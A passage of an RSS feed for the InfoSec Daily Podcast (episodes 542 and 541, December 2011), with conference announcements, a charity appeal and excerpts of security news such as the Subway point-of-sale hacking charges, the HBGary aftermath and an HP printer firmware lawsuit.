	<a href="http://www.shmoocon.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thotcon 0&#215;3</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Friday April 27th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Secret location in Chicago</span><br />
	<a href="http://tickets.thotcon.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://tickets.thotcon.org/</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.scmagazineus.com/four-charged-with-hacking-subway-other-retailers/article/218702"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.scmagazineus.com/four-charged-with-hacking-subway-other-retailers/article/218702</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Four Romanian nationals have been charged with remotely hijacking the credit card processing systems of more than 150 Subway restaurants in the United States, along with dozens of other unnamed retailers, the federal prosecutors </span><a href="http://www.justice.gov/opa/pr/2011/December/11-crm-1598.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">announced</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Thursday.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The defendants, all in their 20s, compromised the credit card data of 80,000 customers and made millions of dollars in unauthorized purchases, according to the U.S. Department of Justice. Starting in 2008 and through May of this year, the defendants hacked into more than 200 U.S.-based merchants&#39; point-of-sale (POS) systems, which are used to process transactions.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The defendants &ndash; Adrian-Tiberiu Oprea, 27, of Constanta; Iulian Dolan, 27, of Craiova; Cezar Iulian Butu, 26, of Ploiesti; and Florin Radu, 23, of Rimnicu Vilcea &ndash; &nbsp;each were charged in New Hampshire with conspiracy to commit computer fraud, wire fraud and access device fraud.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Oprea was arrested last week in Romania and is currently in custody there. Butu and Dolan were both arrested in mid-August upon entering the United States. Radu remains at large.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.infoworld.com/d/the-industry-standard/doj-tells-judge-theres-no-active-att-deal-t-mobile-181379"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infoworld.com/d/the-industry-standard/doj-tells-judge-theres-no-active-att-deal-t-mobile-181379</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The U.S. Department of Justice will file a motion to stay or dismiss its lawsuit to block AT&amp;T&#39;s acquisition of T-Mobile USA because the agency believes there&#39;s no deal pending, a lawyer for the DOJ said Friday.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The DOJ will file the motion on Tuesday in response to AT&amp;T&#39;s decision in November to withdraw its application at the U.S. Federal Communications Commission for the transfer of T-Mobile&#39;s spectrum licenses to AT&amp;T, said Joseph Wayland, the DOJ&#39;s lead attorney in the case. &quot;It&#39;s not a real transaction until they file with the FCC,&quot; Wayland said during a scheduling hearing in the antitrust case.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AT&amp;T withdrew its license transfer application after the FCC announced in November that staff there had found the transaction to be contrary to the public interest. The FCC had planned to send the application to a hearing before an administrative law judge, but AT&amp;T instead withdrew the application.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Wayland told Judge Ellen Segal Huvelle of the U.S. District Court for the District of Columbia that the DOJ would proceed with its case after AT&amp;T refiles its application at the FCC. Huvelle has scheduled a hearing on the DOJ&#39;s motion to stay or dismiss the case for Thursday.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.eweek.com/c/a/Security/10-Holiday-Shopping-Tips-to-Avoid-Buying-Pirated-Software-351045"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.eweek.com/c/a/Security/10-Holiday-Shopping-Tips-to-Avoid-Buying-Pirated-Software-351045</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Most people are being especially cost-conscious this holiday season and cut-rate prices always capture attention. However, if you want to gift your friends and family members with software and related products, take an extra minute and look beyond the price if it looks like &quot;too good&quot; a deal. The </span><a href="http://www.siia.net/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Software &amp; Information Industry Association</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the principal trade association for the software and digital content industries, conducts an aggressive anti-piracy campaign each year, based on balancing enforcement with education. Thus, the SIIA is warning shoppers to be on the lookout this holiday season for pirated software.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1. If the Price Is Too Good to Be True, It Probably Is</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2. &nbsp;Check the Seller or Website&#39;s Reputation</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If You Use an Auction Site, Check the Seller&#39;s Other Auctions</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Check the Seller&#39;s History</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Check the Location of the Seller</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pay Attention to Auction Length</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Don&#39;t Be Fooled by Official-looking Logos and Graphics</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Look for Special Activation/Registration Instructions</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Do Not Buy Compilations</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pay Special Attention to How the Software Is Advertised</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.infoworld.com/d/networking/google-deploys-ipv6-internal-network-181360"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infoworld.com/d/networking/google-deploys-ipv6-internal-network-181360</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google engineer tells Usenix conference the IPv6 project is already bearing fruit even though only halfway finished</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a project that has taken longer than company engineers anticipated, Google is rolling out IPv6 across its entire internal employee network.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google network engineer Irena Nikolova discussed the company-wide implementation at the Usenix Large Installation System Administration (LISA) conference, being held this week in Boston. There, she shared some lessons that other organizations might benefit from as they migrate their own networks to </span><a href="http://www.networkworld.com/news/2011/100511-ipv6-thought-leaders-251649.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">the next generation Internet Protocol</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">From the experience, Google has learned that an IPv6 migration involves more than just updating the software and hardware. It also requires buy-in from management and staff, particularly administrators who already are juggling too many tasks. And, for early adopters, it requires a lot of work with vendors to get them to fix buggy and still-unfinished code. &quot;We should not expect something to work just because it is declared supported,&quot; </span><a href="http://www.usenix.org/events/lisa11/tech/full_papers/Babiker.pdf"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">the paper</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> accompanying the presentation concluded.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.cio.com/article/696248/Anonymous_Attack_on_HBGary_Federal_Didn_t_Ruin_Us_Says_CEO"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.cio.com/article/696248/Anonymous_Attack_on_HBGary_Federal_Didn_t_Ruin_Us_Says_CEO</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When HBGary Federal, had its website hacked and sensitive e-mail exposed by hacktivist group Anonymous last February, it became a question of how Sacramento, Calif.-based security firm HBGary could survive the damage to its reputation.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But in spite of the bruising, HBGary not only didn&#39;t lose business customers in the course of the past year, but &quot;we ended up getting additional business,&quot; says Greg Hoglund, founder and CEO of HBGary. Calling it an unexpected and even &quot;weird side effect,&quot; Hoglund said the widely-publicized attack by Anonymous on HBGary Federal, a separate company set up by HBGary in 2009 to market to the federal government, appears to have elicited a sense of identification from many other companies. &quot;They saw us go through things they were experiencing,&quot; he says.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last February, </span><a href="http://krebsonsecurity.com/2011/02/hbgary-federal-hacked-by-anonymous/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">members of Anonymous</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, apparently furious that then-CEO of HBGary Federal, Aaron Barr, had publicly alluded to his effort to infiltrate the hacktivist group to expose its leaders, lashed out by breaking into the HBGary Federal website. Anonymous then seized tens of thousands of the firm&#39;s e-mails to post them online. The dark episode even had HBGary President Penny Leavy, Hoglund&#39;s wife, going onto an Anonymous IRC channel to basically beg for the attack to end.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.zdnet.co.uk/news/security-management/2011/12/09/hp-faces-lawsuit-over-printer-security-claims-40094625/?s_cid=938"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.co.uk/news/security-management/2011/12/09/hp-faces-lawsuit-over-printer-security-claims-40094625/?s_cid=938</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A lawsuit against HP alleges that the company sold LaserJet printers that it knew had a security flaw in them that could allow hackers to steal data, take control of networks and even cause physical damage to printers through overheating.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The suit, filed last week in district court in San Jose, California, accuses HP of knowingly selling printers with a design defect that renders them &quot;highly vulnerable to attacks by hackers&quot;. The plaintiff, David Goldblatt of New York, said he would not have purchased two HP printers had he known about the problems. It alleges HP violated the California laws designed to protect consumers and prohibit fraudulent or deceptive business practices and seeks class-action status.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The issue stems from the fact that software on the printers that allows for updates over the internet does not use digital signatures to verify the authenticity of any software upgrades or modifications downloaded to the printers, according to the lawsuit.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An HP spokesman told ZDNet UK&#39;s sister site CNET News via email on Thursday that the company does not comment on pending litigation.</span></p>
<p>	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-542-subway-skimmers-attt-how-not-to-get-pirated-software-google-ipv6-hbgary-and-insecure-hp-printers/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3254/0/infosec-daily-podcast-episode-542.mp3" length="24836643" type="audio/mpeg" />
		<itunes:duration>0:51:44</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 542 for December 9, 2011. &#160;&#160;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, Dr. Bonez, and Varun Sharma.
	Special Guest: Johnny Cocaine
	&#160;
Announcements:
Brad Smith ([...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 542 for December 9, 2011. &#160;&#160;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, Dr. Bonez, and Varun Sharma.
	Special Guest: Johnny Cocaine
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Thotcon 0&#215;3
	When: Friday April 27th, 2012
	Where: Secret location in Chicago
	http://tickets.thotcon.org/
	Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;http://www.scmagazineus.com/four-charged-with-hacking-subway-other-retailers/article/218702
	Four Romanian nationals have been charged with remotely hijacking the credit card processing systems of more than 150 Subway restaurants in the United States, along with dozens of other unnamed retailers, the federal prosecutors announced Thursday.
	The defendants, all in their 20s, compromised the credit card data of 80,000 customers and made millions of dollars in unauthorized purchases, according to the U.S. Department of Justice. Starting in 2008 and through May of this year, the defendants hacked into more than 200 U.S.-based merchants&#39; point-of-sale (POS) systems, which are used to process transactions.
	The defendants &#8211; Adrian-Tiberiu Oprea, 27, of Constanta; Iulian Dolan, 27, of Craiova; Cezar Iulian Butu, 26, of Ploiesti; and Florin Radu, 23, of Rimnicu Vilcea &#8211; &#160;each were charged in New Hampshire with conspiracy to commit computer fraud, wire fraud and access device fraud.
	Oprea was arrested last week in Romania and is currently in custody there. Butu and Dolan were both arrested in mid-August upon entering the United States. Radu remains at large.
	&#8230;.
	Source: &#160;http://www.infoworld.com/d/the-industry-standard/doj-tells-judge-theres-no-active-att-deal-t-mobile-181379
	The U.S. Department of Justice will file a motion to stay or dismiss its lawsuit to block AT&#38;T&#39;s acquisition of T-Mobile USA because the agency believes there&#39;s no deal pending, a lawyer for the DOJ said Friday.
	The DOJ will file the motion on Tuesday in response to AT&#38;T&#39;s decision in November to withdraw its application at the U.S. Federal Communications Commission for the transfer of T-Mobile&#39;s spectrum licenses to AT&#38;T, said Joseph Wayland, the DOJ&#39;s lead attorney in the case. &#34;It&#39;s not a real[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 541 &#8211; LulzSec is Back!, MS 14 Patches, Aussie’s Hiring, Top 2011 Hacks, Cnet Apology, Predictions</title>
		<link>http://www.isdpodcast.com/episode-541-lulzsec-is-back-ms-14-patches-aussie%e2%80%99s-hiring-top-2011-hacks-cnet-apology-predictions</link>
		<comments>http://www.isdpodcast.com/episode-541-lulzsec-is-back-ms-14-patches-aussie%e2%80%99s-hiring-top-2011-hacks-cnet-apology-predictions#comments</comments>
		<pubDate>Fri, 09 Dec 2011 01:43:44 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3249</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 541 for December 8, 2011. &#160;&#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Geordy Rostad. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 541 for December 8, 2011. &nbsp;&nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Geordy Rostad.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
